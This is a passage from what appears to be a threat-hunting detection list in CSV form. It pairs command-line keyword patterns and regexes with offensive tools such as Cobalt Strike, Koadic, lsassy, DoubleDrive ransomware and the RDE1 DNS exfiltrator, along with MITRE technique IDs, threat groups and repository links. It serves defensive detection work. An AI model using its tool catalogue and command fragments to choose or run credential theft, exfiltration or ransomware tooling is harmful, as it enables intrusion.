pyasn1.*",".{0,1000}\spyasn1\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","2737" "* PyClone.py*",".{0,1000}\sPyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","2738" "* pyLAPS.py*",".{0,1000}\spyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","2739" "* 
pypykatz*",".{0,1000}\spypykatz.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","2740" "* pyramid.py *",".{0,1000}\spyramid\.py\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","2741" "* pyrdp.mitm.*",".{0,1000}\spyrdp\.mitm\..{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","2742" "* python 
goldenPac *",".{0,1000}\spython\sgoldenPac\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","2743" "* pywsus.py *",".{0,1000}\spywsus\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2744" "* -q mfsconsole*",".{0,1000}\s\-q\smfsconsole.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","https://x.com/mthcht/status/1827714529687658796","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","2745" "* -q -r karma.rc_.txt*",".{0,1000}\s\-q\s\-r\skarma\.rc_\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://www.metasploit.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2746" "* qconn-exec.nse*",".{0,1000}\sqconn\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2747" "* qscan.nse*",".{0,1000}\sqscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2748" "* quake1-info.nse*",".{0,1000}\squake1\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2749" "* quake3-info.nse*",".{0,1000}\squake3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2750" "* quake3-master-getservers.nse*",".{0,1000}\squake3\-master\-getservers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2751" "* quickcrack.py*",".{0,1000}\squickcrack\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","2752" "* QuickViewAD.ps1*",".{0,1000}\sQuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","2753" "* -r airolib-db /root/wpa.cap*",".{0,1000}\s\-r\sairolib\-db\s\/root\/wpa\.cap.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","2754" "* -r data/* -p * -m readfiles*portscan*",".{0,1000}\s\-r\sdata\/.{0,1000}\s\-p\s.{0,1000}\s\-m\sreadfiles.{0,1000}portscan.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and 
exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","N/A","10","3167","538","2025-02-26T19:39:06Z","2018-10-15T19:08:26Z","2755" "* -R dnskire:bind *",".{0,1000}\s\-R\sdnskire\:bind\s.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","2756" "* r77-x64.dll*",".{0,1000}\sr77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","2758" "* r77-x86.dll*",".{0,1000}\sr77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","2759" "* radare *:* -ble*",".{0,1000}\sradare\s.{0,1000}\:.{0,1000}\s\-ble.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1125 - T1071 - T1105 - T1057","TA0010 - TA0002 - TA0007","N/A","N/A","Lateral Movement","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","N/A","4","364","49","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z","2760" "* 
RagingRotator.go*",".{0,1000}\sRagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","2761" "* rai-attack-dns*",".{0,1000}\srai\-attack\-dns.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","2762" "* rai-attack-http*",".{0,1000}\srai\-attack\-http.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","2763" "* --random_user_agent*",".{0,1000}\s\-\-random_user_agent.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials 
for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","2764" "* --random-agent *",".{0,1000}\s\-\-random\-agent\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2765" "* RANSOM_NOTE.txt*",".{0,1000}\sRANSOM_NOTE\.txt.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","2766" "* --ransom-note-name *",".{0,1000}\s\-\-ransom\-note\-name\s.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","2767" "* rapid7/msf-ubuntu*",".{0,1000}\srapid7\/msf\-ubuntu.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","2768" "* rarce.py*",".{0,1000}\srarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","2769" "* rasman.exe*",".{0,1000}\srasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","2770" "* -ratel *",".{0,1000}\s\-ratel\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - 
T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2771" "* Rattler.exe*",".{0,1000}\sRattler\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","2773" "* Rattler_32.exe*",".{0,1000}\sRattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","2774" "* Rattler_x64.exe*",".{0,1000}\sRattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","2775" "* rawrpc_embedded.py*",".{0,1000}\srawrpc_embedded\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","2776" "* --rawscfile ./x86payload.bin*",".{0,1000}\s\-\-rawscfile\s\.\/x86payload\.bin.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource 
Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#linux","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","2777" "* RBCD -action write -delegate-to * -delegate-from *",".{0,1000}\sRBCD\s\-action\swrite\s\-delegate\-to\s.{0,1000}\s\-delegate\-from\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","2778" "* rce.php /var*",".{0,1000}\srce\.php\s\/var.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","2779" "* RCE.py -*",".{0,1000}\sRCE\.py\s\-.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Exploitation tool","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","0","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","2780" "* --rdcman-poison-hkcr*",".{0,1000}\s\-\-rdcman\-poison\-hkcr.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","2781" "* rde1 crde_windows*",".{0,1000}\srde1\scrde_windows.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2782" "* rde1 srde_linux*",".{0,1000}\srde1\ssrde_linux.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2783" "* rde1 srde_macos*",".{0,1000}\srde1\ssrde_macos.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2784" "* rde1 srde_windows*",".{0,1000}\srde1\ssrde_windows.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2785" "* rdp * -u * -p * 
--nla-screenshot*",".{0,1000}\srdp\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-nla\-screenshot.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2786" "*- RDP Session Hijack*",".{0,1000}\-\sRDP\sSession\sHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","2787" "* rdp-enum-encryption.nse*",".{0,1000}\srdp\-enum\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
